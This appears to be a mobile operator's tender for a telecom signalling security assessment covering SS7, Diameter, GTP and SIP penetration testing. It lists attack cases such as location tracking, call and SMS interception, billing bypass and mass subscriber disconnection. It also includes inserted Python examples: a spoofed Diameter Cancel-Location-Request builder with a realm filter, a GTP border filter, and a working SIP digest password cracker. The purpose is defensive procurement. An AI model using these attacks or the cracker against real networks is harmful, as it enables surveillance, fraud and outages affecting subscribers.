
RFP

Telco Signalling Security Assessment


Introduction
Mobile Network Operators (MNOs) have historically treated all signalling messages received from outside their internal network as trusted and necessary. New and evolving interconnect scenarios change this paradigm and create the need for additional security enforcement features.

The purpose of this Request for Information (RFI) is to allow the MNO to understand and evaluate the protection of its customers and its business. The MNO is required to mitigate these risks and prevent attacks by monitoring and filtering signalling traffic at the network boundaries (i.e. the interconnection points towards external signalling networks).

General Conditions
Bidders must specify which chapters of the GSMA recommendations each individual assessment is compliant with. The list must include, but is not limited to:

• GSMA IR.82 (SS7 Security Network Implementation Guidelines), SS7 attacks Category 1, 2, 3 and 5
• GSMA FS.19 (Diameter Interconnect Security), Diameter attacks Category 0, 1, 2 and 3
• GSMA FS.20 (GPRS Tunnelling Protocol (GTP) Security), Category 1, 2, 3
• GSMA FS.07 (SS7 and SIGTRAN Network Security), SS7 and SIGTRAN threats
• GSMA FS.11 (SS7 Interconnect Security Monitoring and Firewall Guidelines), SS7 security monitoring
• ITU-T Q.704 (07/96), Specifications of Signalling System No. 7 – Message Transfer Part: Signalling network functions and messages
• ITU-T Q.713 (03/01), Specifications of Signalling System No. 7 – Signalling Connection Control Part (SCCP): SCCP formats and codes
• ITU-T Q.773 (06/97), Specifications of Signalling System No. 7 – Transaction Capabilities Application Part (TCAP): Transaction capabilities formats and encoding
• 3GPP TS 29.002, Technical Specification Group Core Network and Terminals; Mobile Application Part (MAP) specification; Rel-8
• 3GPP TS 33.200, Technical Specification Group Services and System Aspects; 3G Security; Network Domain Security (NDS); Mobile Application Part (MAP) application layer security; Release 7
• 3GPP TR 23.840, Technical Specification Group Core Network and Terminals; Study into routing of MT-SMs via the HPLMN; Rel-7
Compliance with international standards. During a penetration test, experts use technical materials developed by the Provider and follow generally recognised standards and guidelines on information security testing, such as:

• OSSTMM (Open Source Security Testing Methodology Manual)
• NIST SP 800-115 (National Institute of Standards and Technology Technical Guide to Information Security Testing and Assessment)
• BSI (Bundesamt für Sicherheit in der Informationstechnik, the German Federal Office for Information Security) Penetration Testing Model
• WASC (Web Application Security Consortium) Threat Classification v2.0
• OWASP (Open Web Application Security Project) Testing Guide

Extensive resources. Experts are welcome to use, but are not limited to, advanced security analysis tools, both freeware and commercial, such as:

• WebEngine
• Application Inspector
• Maltego
• Immunity Canvas (VulnDisco, Agora Pack, VoIP Pack, etc.)
• Metasploit
• Nmap
• Nbtscan
• THC Hydra / THC PPTP bruter / ncrack / Bruter
• Cain and Abel
• Wireshark
• Aircrack
• ike-scan
• Yersinia
• SNScan
• Loki
• Kali Linux
• SIPVicious
• Network Scanner
• Procdump, PsExec
• SQLmap
• IDA Pro / OllyDbg
• OWASP DirBuster
• Wce / incognito / fgdump / pwdump
• Acunetix WVS
• Netsparker
• PowerSploit
• PowerShell Empire
• Commix
• Nessus
• Mozilla Firefox with installed plugins: Live HTTP Headers, Tamper Data, Cookie Manager+, Modify Headers, HackBar
• Burp Suite
• ProxyStrike
• A variety of web browsers (Opera, Internet Explorer, Chrome, etc.), including outdated versions, to analyse client-side attacks
• Other
Experts conducting the security assessments must be at senior experience level with proven certifications.

Bidders are free to propose other types of assessment; these should be described and priced separately.

A local instance of a threat-monitoring intrusion detection system is requested, showing attacks and threats in near real time on its own GUI, with an option to integrate with third-party firewalls.

The evaluation must cover all MNO sites.

The results should be presented in a report that covers all the cases assessed, including call traces.

The report must include recommendations to mitigate the identified threats.

An on-site meeting should also be included to present all the results and describe the different problems identified.

Fraud investigation capabilities must be demonstrated on the voice, SMS and data side, since it can be important to conduct such investigations.

Strong IoT security assessment capabilities must be demonstrated in order to verify IoT security postures in evolving scenarios.

Due to the upcoming 5G launch, the bidder must show research capabilities to conduct security assessments and supply-chain work (security guidelines, security advisories, security roll-out testing).

The bidder must also demonstrate:

• Cross-protocol attack testing capabilities
• Simjacker attack testing capabilities
• Ability to conduct internal and external security assessments


RFI Requirements
The objective of this RFI is to realise a signalling security assessment of the MNO signalling network, including the SS7, Diameter, GTP and SIP protocols, together with external and internal penetration tests and an internal security audit.

The MNO's intention under this RFI is to purchase an overall security assessment covering the following domains:

External and Internal Penetration Testing

The following attack cases are mandatory, but not exhaustive, for execution during the external and internal penetration testing:

o General penetration testing
o DNS reconnaissance assessment
o Web application security assessment
o Bypassing the billing system on-site
o Intranet penetration tests via MNO data services

The work must be carried out using the black-box method. The operations are carried out by the Service Provider's experts under the conditions a potential attacker may encounter. The following type of attacker is used for external penetration testing:

A highly skilled outside attacker acting from the Internet without any privileges in the System, performing attacks to gain access to one or several nodes of the MNO's LAN and to obtain privileges sufficient to launch an attack against internal components of the System.

The security assessment is designed to detect defects whose exploitation requires only tools that are generally available or that can be obtained from open sources and from specialised sources with limited access.
Signalling System No. 7 Protocol-Level Assessment

The following attack cases are mandatory, but not exhaustive, for execution during the SS7 security assessment:

o Information disclosure
o Subscriber availability disruption
o Fraud
o Subscriber traffic interception
o Network equipment DoS
o GSMA IR.82 compliance check

To be more specific:

IMSI disclosure. The attack is based on requesting the IMSI and the address of the switch where the subscriber is located (MAP SendRoutingInfoForSM). The request is part of the SMS delivery procedure; it allows the source network to receive information about the subscriber's location for further routing of the message. It can be used for unauthorised network exploration.

Subscriber location discovery. The attack is based on an unauthorised request for the subscriber's location (MAP AnyTimeInterrogation or ProvideSubscriberInfo). The data returned is legitimately used for online billing of the subscriber's terminating calls. The intruder obtains the CGI (Cell Global Identity), which allows them to determine the subscriber's location to within hundreds of metres.

Subscriber profile disclosure. The attack is based on the subscriber profile restoration procedure (MAP RestoreData). The intruder sends a message to restore the subscriber's profile and obtains it in the response.

Service disruption. The attack involves registering the subscriber within a new switch coverage area (MAP UpdateLocation sent from a VLR address under the intruder's control). A similar procedure takes place when a subscriber registers on a roaming partner's network. If the attack is successful, the subscriber does not receive calls or text messages, although the subscriber's phone indicates that it has network coverage.

Terminating SMS message interception. False registration of the subscriber allows the intruder to redirect the subscriber's incoming messages to the intruder's host.

USSD manipulation. The attack imitates a legitimate USSD request sent from the VLR to the HLR (MAP ProcessUnstructuredSS-Request). The most dangerous scenario is sending a request for a transfer of funds between subscriber accounts. Cases that could be tested include:

• Account balance disclosure
• Transfer of funds between subscribers' accounts

Terminating call redirection. The attack is based on replacing the MSC/VLR and providing fake roaming numbers (after a false UpdateLocation, the intruder answers the HLR's ProvideRoamingNumber with a roaming number of its choice), which allows the intruder to affect the routing of voice calls on the operator's network. For example, the intruder may use this method to redirect the subscriber's terminating calls or to forward calls to expensive destinations.

Paying category change. The attack is based on changing the VLR-CSI (CAMEL subscription information) parameters in the subscriber profile that control online billing (MAP InsertSubscriberData). If the intruder removes the VLR-CSI parameters, the subscriber's paying category becomes post-paid, and all subsequent calls of the subscriber bypass the online billing system.

Originating call redirection. The attack is based on changing the gsmSCF address of the online billing system in the subscriber's profile (again via MAP InsertSubscriberData). All originating calls will then query this address, inserted by the intruder, for online billing. The intruder might redirect an originating call to another MSISDN.

Diameter Protocol-Level Assessment

The following attack cases are mandatory, but not exhaustive, for execution during the Diameter security assessment:

o Tests against subscribers (DoS, location disclosure, etc.)
o Tests against the network (DoS, fuzzing)

To be more specific:

Discovering a subscriber's location. The attack is based on an unauthorised request for the subscriber's location (for example an S6a Insert-Subscriber-Data-Request asking the serving MME for EPS location information). The data returned is legitimately used for real-time tariffing of the subscriber's incoming calls. The intruder obtains the ECI (E-UTRAN Cell Identity) and TAC (Tracking Area Code), which allow them to determine the subscriber's location with an accuracy of hundreds of metres.

Subscriber profile disclosure. Because several procedures may return parts of the subscriber's profile in the answer, an attacker can exploit the corresponding requests. As a result of the attack, information from the subscriber's profile is returned by the network.

Network information disclosure. It is possible to acquire information on the different nodes in the operator's network using Diameter procedures, for example from the host names returned in the Origin-Host AVPs of answers.

Disrupting a subscriber's availability. The attack involves de-registering the subscriber from the MME that currently serves it (S6a Cancel-Location-Request). As a result of the attack, the subscriber does not receive calls or SMS, although the phone indicates that it has network coverage. Another option is to register the subscriber with a new MME (S6a Update-Location-Request from a node the intruder controls). A similar procedure takes place when a subscriber registers on a roaming partner's network. As a result, the subscriber cannot use the network's services.

Disrupting service availability. The attack involves sending a large number of connection requests or malformed messages. As a result of the attack, normal operation of the target is disrupted.

Fraud. This attack is based on removing barring of the subscriber's services (for example by rewriting the subscription data with an Insert-Subscriber-Data-Request).
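The de-registration and fuzzing cases above both come down to what a Diameter Edge Agent does with a message before routing it. The following is an added example, not part of the RFP and not any vendor's code: a minimal Diameter (RFC 6733) encoder/decoder for S6a that builds a constructed Cancel-Location-Request, rejects the malformed lengths a fuzzer sends, and checks that a subscriber-targeting command (CLR, IDR, DSR) carries an Origin-Realm matching the home realm derived from the User-Name IMSI per 3GPP TS 23.003 (epc.mnc<MNC>.mcc<MCC>.3gppnetwork.org). Command and AVP codes are those of RFC 6733 and TS 29.272; the home realm, IMSIs and host names are constructed, and Session-Id and Destination-Host are omitted from the sample message for brevity.

```python
# Added example (not from the RFP): minimal Diameter (RFC 6733) encoder/decoder
# for S6a, with an origin-realm check for subscriber-targeting commands. The
# CLR below is constructed; realms follow TS 23.003
# (epc.mnc<MNC>.mcc<MCC>.3gppnetwork.org). Command and AVP codes are from
# RFC 6733 and 3GPP TS 29.272.
import struct
from typing import Optional

S6A_APP_ID = 16777251
CMD_ULR, CMD_CLR, CMD_IDR, CMD_DSR = 316, 317, 319, 320
AVP_USER_NAME, AVP_ORIGIN_HOST, AVP_ORIGIN_REALM = 1, 264, 296
AVP_DEST_REALM, AVP_CANCELLATION_TYPE = 283, 1420
VENDOR_3GPP = 10415
HOME_REALM = "epc.mnc010.mcc510.3gppnetwork.org"   # constructed home realm
# Commands an interconnect peer sends about a subscriber whose HSS it is.
SUBSCRIBER_TARGETING = {CMD_CLR, CMD_IDR, CMD_DSR}


def encode_avp(code: int, value: bytes, vendor: Optional[int] = None) -> bytes:
    flags = 0x40                         # M bit: mandatory
    if vendor is not None:
        flags |= 0x80                    # V bit: Vendor-Id present
    hdr_len = 12 if vendor is not None else 8
    out = struct.pack("!I", code) + bytes([flags]) + (hdr_len + len(value)).to_bytes(3, "big")
    if vendor is not None:
        out += struct.pack("!I", vendor)
    return out + value + b"\x00" * ((4 - len(value) % 4) % 4)   # pad to 32 bits


def encode_message(cmd: int, avps: list, request: bool = True, hbh: int = 1, e2e: int = 1) -> bytes:
    body = b"".join(avps)
    flags = 0x80 if request else 0x00    # R bit
    hdr = bytes([1]) + (20 + len(body)).to_bytes(3, "big") + bytes([flags]) + cmd.to_bytes(3, "big")
    return hdr + struct.pack("!III", S6A_APP_ID, hbh, e2e) + body


def decode_message(data: bytes) -> dict:
    """Parse header and AVPs; raises ValueError on the malformed inputs a fuzzer would send."""
    if len(data) < 20 or data[0] != 1:
        raise ValueError("not a Diameter v1 message")
    length = int.from_bytes(data[1:4], "big")
    if length != len(data):
        raise ValueError("message length mismatch")
    msg = {"request": bool(data[4] & 0x80), "cmd": int.from_bytes(data[5:8], "big"),
           "app": struct.unpack("!I", data[8:12])[0], "avps": {}}
    pos = 20
    while pos < length:
        if pos + 8 > length:
            raise ValueError("truncated AVP header")
        code = struct.unpack("!I", data[pos:pos + 4])[0]
        flags, alen = data[pos + 4], int.from_bytes(data[pos + 5:pos + 8], "big")
        hdr_len = 12 if flags & 0x80 else 8
        if alen < hdr_len or pos + alen > length:
            raise ValueError("bad AVP length")
        vendor = struct.unpack("!I", data[pos + 8:pos + 12])[0] if flags & 0x80 else None
        msg["avps"][(code, vendor)] = data[pos + hdr_len:pos + alen]
        pos += alen + ((4 - alen % 4) % 4)
    return msg


def is_wellformed(data: bytes) -> bool:
    try:
        decode_message(data)
        return True
    except ValueError:
        return False


def home_realm_of_imsi(imsi: str, mnc_len: int = 2) -> str:
    return f"epc.mnc{imsi[3:3 + mnc_len].zfill(3)}.mcc{imsi[:3]}.3gppnetwork.org"


def check_origin_realm(msg: dict) -> str:
    """DEA-side check: a CLR/IDR/DSR for IMSI X must come from X's home realm, never from ours."""
    if msg["cmd"] not in SUBSCRIBER_TARGETING:
        return "NOT_CHECKED"
    imsi = msg["avps"].get((AVP_USER_NAME, None), b"").decode(errors="replace")
    origin = msg["avps"].get((AVP_ORIGIN_REALM, None), b"").decode(errors="replace")
    if not imsi or not origin:
        return "DROP_MISSING_AVP"
    if origin == HOME_REALM:
        return "DROP_SPOOFED_HOME_REALM"   # our realm never originates on the interconnect side
    return "ALLOW" if origin == home_realm_of_imsi(imsi) else "DROP_REALM_MISMATCH"


def build_clr(imsi: str, origin_host: str, origin_realm: str, dest_realm: str) -> bytes:
    """Constructed Cancel-Location-Request: the de-registration attack message."""
    return encode_message(CMD_CLR, [
        encode_avp(AVP_ORIGIN_HOST, origin_host.encode()),
        encode_avp(AVP_ORIGIN_REALM, origin_realm.encode()),
        encode_avp(AVP_DEST_REALM, dest_realm.encode()),
        encode_avp(AVP_USER_NAME, imsi.encode()),
        encode_avp(AVP_CANCELLATION_TYPE, struct.pack("!I", 2), VENDOR_3GPP),  # 2 = SUBSCRIPTION_WITHDRAWAL
    ])
```

A CLR for an inbound roamer from that roamer's home realm passes; the same CLR from any other realm, or a CLR aimed at one of our own IMSIs from outside, is dropped. The realm check is the Diameter counterpart of the SS7 Category 2 rule, and it is only as good as the IPX's own enforcement of Origin-Realm, which is why the RFI asks for monitoring on top of filtering.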

GPRS Tunnelling Protocol (GTP) Security Assessment

The following are sample attack cases, but not exhaustive, for execution during the GTP security assessment:

o Tests for GTPv1
o Tests for GTPv2
o Tests of the PS Core

To be more specific:

IMSI brute force. The attack uses a "Send Routeing Information for GPRS Request" message via GRX to obtain a list of valid IMSIs for further attacks.

Disconnection of authorised subscribers. The attack involves sending "Delete PDP Context Request" messages to the target GGSN with all TEIDs enumerated. The deletion causes all authorised subscribers on that GGSN (which may be 100,000 to 10,000,000 subscribers) to be disconnected but leaves the connection active, preventing new connections from being made.

Blocking connection to the Internet. The attack involves exhausting the available pool of PDP contexts, so that authorised subscribers receive a "No resources available" error.

Internet at the expense of others. The attack involves using an authorised subscriber's IMSI to establish an unauthorised connection to the Internet. The subscriber is billed for the attacker's Internet usage.

Intercepting a subscriber's data. The attack involves the use of spoofed GSN addresses to conduct a phishing attack on a subscriber's data traffic.
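Every case above arrives at the GGSN as a GTPv1-C datagram from the GRX, so the first line of defence is what the GGSN (or a GTP firewall in front of it) accepts from that side. The following is an added example, not part of the RFP and not any vendor's code: a GTPv1-C header codec (3GPP TS 29.060 message types) and a border filter that drops the MAP-interworking probe used for IMSI brute force, rejects malformed headers, refuses GTP from addresses that are not roaming partners, and requires Update/Delete PDP Context requests to quote a TEID the GGSN actually allocated to that peer, which is what defeats a TEID sweep. The peer list, the session table and the sample datagrams are constructed.

```python
# Added example (not from the RFP): a GTPv1-C header codec and a GRX-border
# filter sketch covering the attack cases above. Message types follow
# 3GPP TS 29.060; the peer list and session table are constructed sample data.
import struct

ECHO_REQ, ECHO_RSP = 1, 2
CREATE_PDP_REQ, CREATE_PDP_RSP = 16, 17
UPDATE_PDP_REQ, UPDATE_PDP_RSP, DELETE_PDP_REQ, DELETE_PDP_RSP = 18, 19, 20, 21
SRI_GPRS_REQ, FAILURE_REPORT_REQ, NOTE_MS_PRESENT_REQ = 32, 34, 36
# MAP-interworking messages that a GGSN has no reason to accept from a GRX peer
# (the "Send Routeing Information for GPRS" IMSI probe lives here).
GRX_BLOCKED_TYPES = {SRI_GPRS_REQ, FAILURE_REPORT_REQ, NOTE_MS_PRESENT_REQ}

ROAMING_PARTNER_SGSN = {"203.0.113.10", "198.51.100.20"}          # constructed
# Constructed GGSN session table: control-plane TEID we allocated -> peer SGSN.
ACTIVE_SESSIONS = {0x1000: "203.0.113.10", 0x1001: "198.51.100.20"}


def encode_gtpv1c(msg_type: int, teid: int, seq=None, payload: bytes = b"") -> bytes:
    flags = 0x20 | 0x10                  # version 1, PT=1 (GTP rather than GTP')
    opt = b""
    if seq is not None:
        flags |= 0x02                    # S flag: sequence number present
        opt = struct.pack("!HBB", seq, 0, 0)     # sequence, N-PDU number, next extension header
    return struct.pack("!BBHI", flags, msg_type, len(opt) + len(payload), teid) + opt + payload


def decode_gtpv1c(data: bytes) -> dict:
    if len(data) < 8:
        raise ValueError("short header")
    flags, msg_type, length, teid = struct.unpack("!BBHI", data[:8])
    if flags >> 5 != 1:
        raise ValueError("not GTPv1")
    if length != len(data) - 8:
        raise ValueError("length mismatch")
    msg = {"type": msg_type, "teid": teid, "seq": None}
    pos = 8
    if flags & 0x07:                     # any of E, S, PN set: the optional 4 octets are present
        if len(data) < 12:
            raise ValueError("truncated optional header")
        if flags & 0x02:
            msg["seq"] = struct.unpack("!H", data[8:10])[0]
        pos = 12
    msg["payload"] = data[pos:]
    return msg


def filter_grx(src_ip: str, data: bytes) -> str:
    """Verdict for one GTP-C datagram received from the GRX/IPX side of a GGSN."""
    try:
        msg = decode_gtpv1c(data)
    except ValueError:
        return "DROP_MALFORMED"
    if src_ip not in ROAMING_PARTNER_SGSN:
        return "DROP_UNKNOWN_PEER"       # no roaming agreement -> no GTP at all
    if msg["type"] in GRX_BLOCKED_TYPES:
        return "DROP_BLOCKED_TYPE"
    if msg["type"] in (UPDATE_PDP_REQ, DELETE_PDP_REQ):
        # Requests about an existing tunnel must quote a TEID we handed out,
        # and come from the SGSN that owns that session. A TEID sweep
        # ("Delete PDP Context with all TEIDs listed") fails here on every
        # unallocated value and is also the trigger for per-peer rate limiting.
        owner = ACTIVE_SESSIONS.get(msg["teid"])
        if owner is None:
            return "DROP_UNKNOWN_TEID"
        if owner != src_ip:
            return "DROP_TEID_OWNER_MISMATCH"
    return "ALLOW"


if __name__ == "__main__":
    probes = [
        ("203.0.113.10", encode_gtpv1c(SRI_GPRS_REQ, 0, seq=1)),
        ("203.0.113.10", encode_gtpv1c(DELETE_PDP_REQ, 0x2222, seq=2)),
        ("198.51.100.20", encode_gtpv1c(DELETE_PDP_REQ, 0x1000, seq=3)),
        ("192.0.2.99", encode_gtpv1c(CREATE_PDP_REQ, 0, seq=4)),
    ]
    for ip, pkt in probes:
        print(ip, decode_gtpv1c(pkt)["type"], "->", filter_grx(ip, pkt))
```

Note what this does not cover: a Create PDP Context Request from a genuine roaming partner carrying somebody else's IMSI (the "Internet at the expense of others" case) looks perfectly well-formed here, and is only caught by correlating the IMSI against the subscriber's current SGSN, which is HLR/HSS state rather than anything in the GTP header.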
Session Initiation Protocol (SIP) Security Assessment

The following is a high-level sample of attack vectors for execution during the SIP security assessment:

o Authentication manipulation
o Traffic manipulation
o DoS

To be more specific:

Authentication manipulation. These attacks use a variety of methods, including checks of the authentication of both SIP UEs and SIP trunks.

The results of these attacks include:

o Fraud (via masquerading as another subscriber)
o Further attack vector development

Example authentication manipulation attacks to be performed in both SIP UE and SIP trunk scenarios include:

o SIP registration hijacking
o SIP authentication dictionary attacks
o Digest cracking (offline recovery of the password from a captured digest response)
o SIP caller ID spoofing
o Media hijacking
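The dictionary and digest-cracking cases above work because SIP (RFC 3261) reuses the HTTP digest scheme (RFC 2617): one REGISTER captured on an unencrypted signalling path, with its Authorization header, is enough for an offline attack that the registrar never sees. The following is an added example, not part of the RFP and not any vendor's code, that parses such a header and recomputes the response against a word list, with and without qop=auth. The credentials, nonce, realm and word list are constructed, and the "captured" header is generated by the same code so that the block runs stand-alone.

```python
# Added example (not from the RFP): offline cracking of a captured SIP digest
# response. SIP (RFC 3261) reuses the HTTP digest scheme (RFC 2617), so one
# sniffed REGISTER with its Authorization header is enough for an offline
# dictionary attack. The header, credentials and word list are constructed
# by this code itself.
import hashlib
import re
from typing import Iterable, Optional


def md5hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(username: str, realm: str, password: str, method: str, uri: str,
                    nonce: str, qop: Optional[str] = None, nc: Optional[str] = None,
                    cnonce: Optional[str] = None) -> str:
    """RFC 2617 response for algorithm=MD5, with and without qop=auth."""
    ha1 = md5hex(f"{username}:{realm}:{password}")
    ha2 = md5hex(f"{method}:{uri}")
    if qop == "auth":
        return md5hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return md5hex(f"{ha1}:{nonce}:{ha2}")


def build_register_authorization(username: str, realm: str, password: str, nonce: str, uri: str,
                                 qop: Optional[str] = None, cnonce: Optional[str] = None,
                                 nc: str = "00000001") -> str:
    """What a UE puts in its second REGISTER after a 401 challenge (constructed sample)."""
    resp = digest_response(username, realm, password, "REGISTER", uri, nonce, qop, nc, cnonce)
    hdr = (f'Authorization: Digest username="{username}", realm="{realm}", nonce="{nonce}", '
           f'uri="{uri}", response="{resp}", algorithm=MD5')
    if qop:
        hdr += f', qop={qop}, nc={nc}, cnonce="{cnonce}"'
    return hdr


_PARAM_RE = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')


def parse_authorization(header: str) -> dict:
    """Split a Digest Authorization header into its parameters (quoted or bare values)."""
    scheme, _, rest = header.partition(": ")[2].partition(" ")
    if scheme.lower() != "digest":
        raise ValueError("not a Digest Authorization header")
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in _PARAM_RE.finditer(rest)}


def crack_digest(params: dict, method: str, wordlist: Iterable[str]) -> Optional[str]:
    """Recompute the response for each candidate password; return the match, if any."""
    for candidate in wordlist:
        guess = digest_response(params["username"], params["realm"], candidate, method,
                                params["uri"], params["nonce"], params.get("qop"),
                                params.get("nc"), params.get("cnonce"))
        if guess == params["response"]:
            return candidate
    return None


WORDLIST = ["123456", "password", "sip2019", "summer2019", "Welcome1"]   # constructed

if __name__ == "__main__":
    captured = build_register_authorization("2001", "ims.example.net", "summer2019",
                                            "6f3a9c1e5d2b", "sip:ims.example.net")
    print(captured)
    print("cracked:", crack_digest(parse_authorization(captured), "REGISTER", WORDLIST))
```

The method has to be the one from the captured request (REGISTER here); the same header tested against INVITE never matches, which is a convenient sanity check when a capture is ambiguous. The mitigation the assessment should verify is the usual pair: strong, per-device SIP secrets and TLS (or IPsec on the Gm interface) so the digest is never exposed on the wire.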

Traffic manipulation. These attacks are aimed at scanning and changing the direction of traffic flows. Results of these attacks include:

o Disclosure of subscriber information
o Disclosure of network information
o Disclosure of transferred information (eavesdropping)
o Fraud, including toll fraud and information fraud
o SPAM

Example traffic manipulation attacks to be performed in both SIP UE and SIP trunking scenarios include:

o Call redirection
o Forced call teardown
o Media injection

Service availability disruption. These attacks are aimed at impacting network performance. Results of these attacks include:

o Subscriber loss of service
o General network performance degradation

Example service availability disruption attacks to be performed in both SIP UE and SIP trunking scenarios include:

o SIP protocol floods (INVITE, REGISTER, OPTIONS)
o SIP DoS (BYE, REGISTER, de-registration via REGISTER with Expires: 0)
o Media plane DoS
o Malformed packets

Internal Device Security Audit

The goal of the security analysis of the MNO's telco devices is to detect all vulnerable elements in the System and in the services that support its operation, and to obtain an objective and independent assessment of the current security level.

To achieve this goal, the following objectives must be met:

o Device misconfiguration check
o Reverse engineering assessment
o Identify flaws in the System's information security and operation, and assess the probability of their exploitation by attackers
o Demonstrate possible vulnerability exploitation techniques

All of the above security assessments must include a compliance check according to the GSMA categories (the SS7, Diameter and GTP message categories referenced under General Conditions):

• Category 1
• Category 2
• Category 3

They should also include, but not be limited to:

• Abnormal behaviour assessment
• Evaluation of billing/charging system bypass
• Cross-protocol evaluation
• Spoofing evaluation
• SMS spam and fraud
• DoS attacks

Upon completion of the testing, the Customer must receive a final Report on Testing Results, which must contain, but is not limited to:

• General information about the conducted penetration testing
• The results of the conducted checks
• Conclusions (both detailed and a brief version for top management)
• Security assessment of the Customer's security system in terms of both potential attack vectors and implemented security mechanisms
• A list and description of existing threats
• A graphical representation of the detected attack vectors along with an assessment of their implementation complexity
• A summary of the web application vulnerability analysis and methods for eliminating the vulnerabilities
• A description of the testing procedure and of the detected vulnerabilities, ranked by severity level, exploitability and consequences
• A list of compromised System components
• Recommendations on how to eliminate the detected vulnerabilities, including recommendations on hardware reconfiguration, the protection mechanisms and software in use, additional measures and protection tools, and update installation
• Results of the exploitation of several critical vulnerabilities, including information on the System privilege level obtained at different stages of the testing
Pre-Qualification
Bidders must detail their telco signalling expertise by means of:

• Curricula of the persons involved in the project
• Participation in GSMA security activities
• Previous experience in similar activities, mainly in our region
• IoT security assessment knowledge

Decision criteria
The final decision will be based on the following points:

• Audit compliance with GSMA FS.11
• Price
• Bidder experience and public reputation
• Participation in GSMA security activities
• Presence of a local office in Indonesia
• Technical criteria
